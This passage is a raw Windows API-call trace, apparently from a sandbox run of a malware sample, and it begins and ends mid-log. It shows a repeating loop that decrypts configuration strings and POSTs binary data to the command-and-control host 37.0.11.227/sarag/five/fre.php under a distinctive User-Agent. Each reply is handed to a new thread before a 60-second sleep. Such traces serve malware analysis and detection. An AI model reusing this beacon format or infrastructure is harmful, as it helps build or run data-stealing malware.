hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0260.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.904] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0260.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.905] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.905] GetProcessHeap () returned 0x690000 [0260.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0260.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.907] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0260.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.908] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0260.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0260.911] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0260.911] GetProcessHeap () returned 0x690000 [0260.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0260.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.912] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0260.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.913] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0260.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.914] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0260.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.915] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0260.915] GetProcessHeap () returned 0x690000 [0260.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0260.915] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0260.915] GetProcessHeap () returned 0x690000 [0260.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0260.915] socket (af=2, type=1, protocol=6) returned 0x78c [0260.915] connect (s=0x78c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0260.952] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0260.952] GetProcessHeap () returned 0x690000 [0260.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0260.952] GetProcessHeap () returned 0x690000 [0260.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0260.953] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0260.954] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0260.954] GetProcessHeap () returned 0x690000 [0260.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0260.954] GetProcessHeap () returned 0x690000 [0260.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0260.955] GetProcessHeap () returned 0x690000 [0260.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0260.955] GetProcessHeap () returned 0x690000 [0260.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0260.956] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0260.963] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0260.963] GetProcessHeap () returned 0x690000 [0260.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0260.963] GetProcessHeap () returned 0x690000 [0260.964] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0260.964] send (s=0x78c, buf=0x6ad508*, len=242, flags=0) returned 242 [0260.964] send (s=0x78c, buf=0x6aba40*, len=159, flags=0) returned 159 [0260.964] GetProcessHeap () returned 0x690000 [0260.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0260.965] recv (in: s=0x78c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0261.057] GetProcessHeap () returned 0x690000 [0261.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0261.057] GetProcessHeap () returned 0x690000 [0261.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0261.057] GetProcessHeap () returned 0x690000 [0261.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0261.058] GetProcessHeap () returned 0x690000 [0261.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0261.058] closesocket (s=0x78c) returned 0 [0261.058] GetProcessHeap () returned 0x690000 [0261.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0261.058] GetProcessHeap () returned 0x690000 [0261.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0261.059] GetProcessHeap () returned 0x690000 [0261.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0261.059] GetProcessHeap () returned 0x690000 [0261.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0261.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1534) returned 0x78c [0261.063] Sleep (dwMilliseconds=0xea60) [0261.065] GetProcessHeap () returned 0x690000 [0261.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0261.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.067] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0261.082] GetProcessHeap () returned 0x690000 [0261.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0261.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.084] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0261.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.085] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.086] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.093] GetProcessHeap () returned 0x690000 [0261.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0261.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.094] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0261.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.095] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0261.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.096] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0261.096] GetProcessHeap () returned 0x690000 [0261.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0261.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.097] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.098] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.099] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.100] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.100] GetProcessHeap () returned 0x690000 [0261.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0261.100] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0261.101] GetProcessHeap () returned 0x690000 [0261.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0261.101] GetProcessHeap () returned 0x690000 [0261.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0261.101] GetProcessHeap () returned 0x690000 [0261.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0261.101] GetProcessHeap () returned 0x690000 [0261.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0261.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.102] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.108] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0261.114] GetProcessHeap () returned 0x690000 [0261.114] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0261.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.115] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0261.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.116] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.117] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.117] GetProcessHeap () returned 0x690000 [0261.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0261.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.118] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0261.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.119] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0261.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.120] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0261.120] GetProcessHeap () returned 0x690000 [0261.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0261.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.121] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0261.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.122] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0261.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.123] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0261.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.124] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0261.124] GetProcessHeap () returned 0x690000 [0261.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0261.124] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0261.124] GetProcessHeap () returned 0x690000 [0261.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0261.124] socket (af=2, type=1, protocol=6) returned 0x790 [0261.124] connect (s=0x790, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0261.155] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0261.155] GetProcessHeap () returned 0x690000 [0261.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0261.155] GetProcessHeap () returned 0x690000 [0261.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0261.156] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0261.157] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0261.157] GetProcessHeap () returned 0x690000 [0261.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0261.157] GetProcessHeap () returned 0x690000 [0261.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0261.158] GetProcessHeap () returned 0x690000 [0261.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0261.158] GetProcessHeap () returned 0x690000 [0261.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0261.159] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0261.159] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0261.160] GetProcessHeap () returned 0x690000 [0261.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0261.160] GetProcessHeap () returned 0x690000 [0261.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0261.160] send (s=0x790, buf=0x6ad508*, len=242, flags=0) returned 242 [0261.161] send (s=0x790, buf=0x6aba40*, len=159, flags=0) returned 159 [0261.162] GetProcessHeap () returned 0x690000 [0261.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0261.162] recv (in: s=0x790, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0261.227] GetProcessHeap () returned 0x690000 [0261.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0261.228] GetProcessHeap () returned 0x690000 [0261.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0261.229] GetProcessHeap () returned 0x690000 [0261.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0261.230] GetProcessHeap () returned 0x690000 [0261.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0261.230] closesocket (s=0x790) returned 0 [0261.232] GetProcessHeap () returned 0x690000 [0261.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0261.232] GetProcessHeap () returned 0x690000 [0261.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0261.232] GetProcessHeap () returned 0x690000 [0261.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0261.234] GetProcessHeap () returned 0x690000 [0261.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0261.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1538) returned 0x790 [0261.237] Sleep (dwMilliseconds=0xea60) [0261.245] GetProcessHeap () returned 0x690000 [0261.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0261.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.246] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0261.265] GetProcessHeap () returned 0x690000 [0261.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0261.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.270] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0261.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.274] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.275] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.275] GetProcessHeap () returned 0x690000 [0261.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0261.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.276] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0261.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.278] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0261.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.279] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0261.279] GetProcessHeap () returned 0x690000 [0261.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0261.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.280] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.281] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.282] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.284] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.284] GetProcessHeap () returned 0x690000 [0261.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0261.284] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0261.284] GetProcessHeap () returned 0x690000 [0261.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0261.285] GetProcessHeap () returned 0x690000 [0261.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0261.285] GetProcessHeap () returned 0x690000 [0261.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0261.285] GetProcessHeap () returned 0x690000 [0261.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0261.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.287] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.293] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0261.303] GetProcessHeap () returned 0x690000 [0261.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0261.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.307] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0261.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.309] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.310] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.310] GetProcessHeap () returned 0x690000 [0261.311] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0261.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.312] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0261.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.313] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0261.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0261.314] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0261.314] GetProcessHeap () returned 0x690000 [0261.314] RtlAllocateHeap 